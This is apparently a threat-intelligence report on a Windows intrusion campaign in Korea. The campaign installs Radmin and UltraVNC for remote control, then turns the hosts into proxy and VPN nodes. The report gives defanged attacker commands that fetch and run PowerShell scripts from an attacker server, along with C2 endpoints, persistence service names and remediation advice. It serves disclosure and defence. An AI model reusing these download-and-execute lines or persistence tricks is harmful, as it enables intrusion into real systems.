Threat reportMalwareTL-2026-2323
Attacks in Korea Deploy Radmin and UltraVNC for Remote Control, Followed by Proxy/VPN Tools for Infrastructure Abuse
Attacks in Korea Deploy Radmin and UltraVNC for Remote (TL-2026-2323) is a high-severity malware campaign, first published 2026-09-03. It has no confirmed attribution, affects Microsoft Windows, maps to 13 MITRE ATT&CK techniques (T1027.002, T1036.005, T1053.005), and is covered by 9 detection rules and 26 indicators of compromise.
- Severity
- HIGHAssessed severity
- CVEs
- 0None referenced
- Techniques
- 13MITRE ATT&CK
- Actors
- 0Not attributed
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 26Indicators of compromise
Key facts for TL-2026-2323
- Threat ID
- TL-2026-2323
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution confidence
- LOW
- Motivation
- FINANCIAL
- Target regions
- south korea
- Detection rules
- 9
- Indicators of compromise
- 26
Malware and tooling in Attacks in Korea Deploy Radmin and UltraVNC for Remote
Malware and tooling: Ultra VNC, CCProxy, Netch-gateway, RAdmin, SoftEther VPN, UltraVNC
How Attacks in Korea Deploy Radmin and UltraVNC for Remote works
AhnLab ASEC observed intrusions against Windows systems in Korea where attackers used PowerShell (curl) to download and install Radmin for initial remote control, followed by UltraVNC for persistence, then deployed the Netch-gateway and CCProxy proxy tools plus SoftEther VPN to repurpose compromised hosts as proxy/VPN nodes. Script comments, tool familiarity, and configuration language suggest a Chinese-speaking threat actor; the initial intrusion vector is unknown.
ASEC (AhnLab Security intelligence Center) documented a multi-stage intrusion campaign against Windows systems in Korea in which the initial access vector is unconfirmed, but the post-compromise chain is fully reconstructed from recovered scripts and installers. The attacker used PowerShell curl to fetch a compressed archive (r.Zip) from hxxp://103.86.86[.]244:800/Gateway/r.Zip containing a batch script, a registry file, and the Radmin remote-control tool. The batch file 11.Bat installed Radmin to C:\Intel\RServer and applied a registry file (install.Reg) that embedded an attacker-linked configuration identifier, 'ruxin', establishing initial remote-desktop control.
Following Radmin, the attacker ran a hidden PowerShell command (irm hxxp://103.86.86[.]244:800/V/deploy.Ps1 | iex) to install UltraVNC into C:\Windows\Fonts\web, registering a malicious Windows service named 'WpnUserHost' (masquerading as a Windows push-notification component) alongside a scheduled watchdog task, 'WpnUserHost_MutualWatchdog', to guarantee persistence. A PyInstaller-built companion agent (recently observed in Go-compiled variants), built around a core agent.py component, enrolls the host with the attacker's infrastructure via /Api/agent/enroll, reports the VNC listening port and status via /Api/agent/heartbeat, and confirms randomized/encrypted VNC credentials via /Api/agent/password_ack against a command server at hxxp://tt.Yeyoujs[.]Com:8443, with a separate tunneling endpoint at tt.Yeyoujs[.]Com:9443.
With remote control established, the actor pivoted the host into proxy/VPN infrastructure for its own use. A further hidden PowerShell command (irm hxxp://103.86.86[.]244:800/Gateway/deploy_silent1.Ps1 | iex) installed Netch-gateway, a Chinese-developer proxy client supporting SOCKS5, Shadowsocks, and KCP, which registers with the operator's backend through /Internal/shadowsocks/auto-config and receives config/heartbeat instructions per-node. Separately, a WinRAR self-extracting (SFX) archive dropped CCProxy, configured to listen as a SOCKS proxy on port 49661 (CCProxy.Ini), and a second WinRAR SFX with a batch installer (a.Bat) deployed SoftEther VPN disguised as svchost.exe (vpn_server.Config), turning the host into an attacker-usable VPN server node. ASEC assesses the operator is Chinese-speaking based on Chinese-language comments in the scripts, familiarity with Chinese-developed tooling (Netch-gateway), and a Chinese-language interface on the proxy management page; no nation-state sponsorship is claimed.
The net effect is a host fully controlled via two redundant remote-access channels (Radmin, UltraVNC) and repurposed as attacker-controlled proxy/VPN relay infrastructure (Netch-gateway, CCProxy, SoftEther VPN) — creating both a direct data-theft exposure on the victim and a downstream risk that the victim's IP/infrastructure is used to relay the actor's other malicious traffic. ASEC has separately tracked a related but distinct cluster (attributed to 'Larva-26010', reported 2026-08-11 at asec.ahnlab.com/en/94995/) abusing SoftEther VPN against Korean web servers with similar disguise techniques (executable renamed to vmtoolsd.exe, WDigest UseLogonCredential registry modification for plaintext credential harvesting) using unrelated infrastructure (64.176.55.16, 45.76.144.150, 139.180.210.71, 64.176.46.157) — suggesting this report may be part of a broader wave of proxy/VPN infrastructure abuse against Korean systems, though ASEC has not formally linked the two campaigns under a single actor label.
MITRE ATT&CK techniques used in TL-2026-2323
Defense Evasion
T1027.002 Obfuscated Files or Information: Software Packing; T1036.005 Match Legitimate Resource Name or Location
Persistence
T1053.005 Scheduled Task/Job: Scheduled Task; T1543.003 Create or Modify System Process: Windows Service
Execution
T1059.001 Command and Scripting Interpreter: PowerShell; T1059.003 Command and Scripting Interpreter: Windows Command Shell
Command and Control
T1071.001 Application Layer Protocol: Web Protocols; T1090 Proxy; T1090.002 Proxy: External Proxy; T1219 Remote Access Tools; T1571 Non-Standard Port
defense-impairment
Resource Development
Affected products and versions in Attacks in Korea Deploy Radmin and UltraVNC for Remote
- Microsoft — Windows
Vulnerable versions: Unspecified Windows versions on internet-reachable/managed endpoints in Korea
Remediation for Attacks in Korea Deploy Radmin and UltraVNC for Remote
Immediate actions
- Block outbound traffic to 103.86.86.244 (all ports, including 800), tt.yeyoujs.com (8443, 9443), tvip.yeyoujs.com, koreakr.top, and www.sheng886.top at perimeter/DNS/proxy layers.
- Hunt for the service name 'WpnUserHost' and scheduled task 'WpnUserHost_MutualWatchdog' — these are not legitimate Windows components and indicate active UltraVNC-based compromise.
- Hunt for installations under C:\Intel\RServer and C:\Windows\Fonts\web, and for unexpected svchost.exe copies outside C:\Windows\System32 (SoftEther VPN masquerading).
- Alert on unauthorized installation of Radmin, UltraVNC, CCProxy, Netch-gateway, or SoftEther VPN via EDR software-inventory / process-creation telemetry.
- Review outbound listeners on non-standard high ports (e.g., 49661) for unauthorized SOCKS proxy activity (CCProxy).
Workarounds
- Where Radmin/UltraVNC are not business-required, remove them and block their default ports; where required, restrict access with IP allowlisting and MFA on the remote-admin gateway.
Longer-term hardening
- Restrict outbound PowerShell network access (curl, Invoke-RestMethod/irm) via application control or constrained-language-mode policies on endpoints that do not require it.
- Deploy EDR with behavioral detection for irm|iex download-and-execute patterns and for legitimate remote-admin tools installed outside change-management windows.
- Deny-list or require approval for commercial/open-source remote-control and proxy/VPN software (Radmin, UltraVNC, CCProxy, SoftEther VPN, Netch-family tools) via application allowlisting.
- Monitor for WinRAR SFX archives executing embedded batch installers as a delivery pattern.
Timeline of Attacks in Korea Deploy Radmin and UltraVNC for Remote
- A WinRAR SFX archive with batch installer a.Bat deploys SoftEther VPN disguised as svchost.exe (vpn_server.Config), turning the host into an attacker-controlled VPN server node.
- A WinRAR self-extracting archive installs CCProxy configured to listen on SOCKS port 49661 (CCProxy.Ini), adding a second proxy service on the host.
- A further hidden PowerShell command (irm hxxp://103.86.86[.]244:800/Gateway/deploy_silent1.Ps1 | iex) installs Netch-gateway, registering the host as a SOCKS5/Shadowsocks/KCP proxy node via /Internal/shadowsocks/auto-config.
- A PyInstaller-built 'client' agent (agent.py core) enrolls with the operator's backend via /Api/agent/enroll and reports VNC port/status via /Api/agent/heartbeat, confirming randomized, encrypted VNC credentials through /Api/agent/password_ack against command server hxxp://tt.Yeyoujs[.]Com:8443.
- A hidden PowerShell command (irm hxxp://103.86.86[.]244:800/V/deploy.Ps1 | iex) installs UltraVNC into C:\Windows\Fonts\web, registering the 'WpnUserHost' service and 'WpnUserHost_MutualWatchdog' scheduled task for persistence.
- 11.Bat is executed to install Radmin to C:\Intel\RServer and apply install.Reg, configuring the tool with the attacker-linked identifier 'ruxin' for remote desktop access.
- Attacker uses PowerShell curl to download r.Zip from hxxp://103.86.86[.]244:800/Gateway/r.Zip, containing a batch script, a registry file, and the Radmin remote-control tool.
- AhnLab ASEC publishes 'Attack Cases in Korea Involving the Installation of Radmin and UltraVNC', detailing a multi-stage intrusion and proxy/VPN infrastructure-abuse campaign against Korean Windows systems.
Sources cited for Attacks in Korea Deploy Radmin and UltraVNC for Remote
- Attack Cases in Korea Involving the Installation of Radmin and UltraVNC
- Attack Cases for Domestic Web Servers Running SoftEther VPN in Korea
- Attack Cases in Korea Involving the Installation of Radmin and UltraVNC (mirror)
- Attack Cases in Korea Involving the Installation of Radmin and UltraVNC (mirror)
- HackTool.Win32.Radmin.GH — Threat Encyclopedia
Detection coverage for TL-2026-2323
As of 2026-09-03, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2323 across Splunk SPL, Microsoft KQL and Sigma, covering 26 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.